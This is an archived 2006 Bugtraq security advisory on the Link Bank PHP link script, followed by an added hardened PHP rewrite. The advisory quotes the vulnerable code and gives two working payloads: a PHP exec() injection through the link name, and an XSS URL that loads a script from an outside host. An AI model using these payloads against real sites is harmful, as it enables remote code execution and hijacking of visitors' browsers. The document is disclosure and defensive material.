Open Source and information security mailing list archives
Message-ID: <20060306235213.30902.qmail@securityfocus.com>
Date: 6 Mar 2006 23:52:13 -0000
From: retard@...igs.com
To: bugtraq@...urityfocus.com
Subject: link bank code execution and xss

-------- summary

software: Link Bank
vendor's website: http://daverave.64digits.com/index.php?page=linkbank
versions: n/a
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: high

-------- description

Link Bank does not sanitise posts submitted to it, allowing users to insert data that can be used maliciously. After it is submitted, the data goes to a .txt file which the application reads and executes to display the links submitted. Along with this, it is vulnerable to XSS due to the application not sanitising the variable again.

in ./content/index.txt:

    <?php
    include("links.txt");
    ?>

in ./content/add_link.txt:

    $url_name = $_REQUEST['url_name'];
    $url = $_REQUEST['url'];
    $img = $_REQUEST['img'];
    $filename = "content/links.txt";
    $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>";

in ./iframe.php:

    <title>Link Bank - <?php echo"$site";?></title>

-------- exploit(s)

code execution:
submit something like <?php exec($cmd) ?> as a link name

xss:
http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

-------- credit

author(s): retard
email: retard@...igs.com
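A hardened counterpart to the three snippets quoted in the advisory, added here as an example; it is not Link Bank's code and not part of the original post. The function names and the `content/links.jsonl` store are assumptions: submissions are kept as data that is never passed to `include()`, and every value is escaped on output.

```php
<?php
// Added example, not Link Bank's code; names and the store path are assumptions.
declare(strict_types=1);
const LINK_STORE = __DIR__ . '/content/links.jsonl'; // data only, never include()d

// Escape for an HTML text node or a quoted attribute value.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only absolute http(s) URLs; rejects javascript:, data: and similar.
function valid_link_url(string $url): bool {
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return filter_var($url, FILTER_VALIDATE_URL) !== false
        && in_array($scheme, ['http', 'https'], true);
}

// add_link: one JSON record per line instead of markup written to an included file.
function add_link(string $name, string $url, string $store = LINK_STORE): bool {
    $name = trim($name);
    if ($name === '' || strlen($name) > 200 || !valid_link_url($url)) {
        return false;
    }
    $flags = JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_SUBSTITUTE;
    $record = json_encode(['name' => $name, 'url' => $url], $flags);
    return file_put_contents($store, $record . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// index: read the records as data and escape every value on output.
function render_links(string $store = LINK_STORE): string {
    $html = '';
    $lines = is_file($store) ? file($store, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
    foreach ($lines as $line) {
        $r = json_decode($line, true);
        if (!is_array($r) || !isset($r['name'], $r['url']) || !valid_link_url((string) $r['url'])) {
            continue; // skip malformed or tampered records
        }
        $href = 'iframe.php?site=' . rawurlencode((string) $r['url']);
        $html .= '<a href="' . h($href) . '" target="_blank" rel="noopener">' . h((string) $r['name']) . "</a><br>\n";
    }
    return $html;
}

// iframe.php: take the parameter explicitly from the query and escape it in the title.
function render_title(array $query): string {
    $site = isset($query['site']) && is_string($query['site']) ? $query['site'] : '';
    return '<title>Link Bank - ' . h(valid_link_url($site) ? $site : 'invalid link') . '</title>';
}
```

A link name such as the PHP tag from the advisory is stored as an inert JSON string and rendered as escaped text, and `render_title($_GET)` turns the `</title>` breakout in the XSS URL into the literal text "invalid link".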